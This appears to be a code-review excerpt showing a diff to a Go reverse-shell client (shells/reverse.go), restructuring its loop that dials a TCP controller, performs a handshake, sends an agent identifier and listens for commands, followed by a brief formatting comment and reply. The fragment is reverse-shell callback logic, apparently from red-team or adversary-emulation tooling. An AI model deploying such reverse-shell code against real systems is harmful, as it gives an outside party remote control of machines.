shells/reverse.go

```diff
@@ -57,12 +63,14 @@ func main() {
       conn, err := net.Dial("tcp", *tcp)
       if err != nil {
          fmt.Println(err)
-         time.Sleep(5 * time.Second)
-         continue
-      }
+      }else{
+      handshake(conn)
       conn.Write([]byte(paw))
       listen(conn)
+      }
+         time.Sleep(5 * time.Second)
```

Comment:
check formatting

Reply:
fixed this whitespace in 1c6e778ddf92c34aea7b8b5a4d7fedabbc6a47da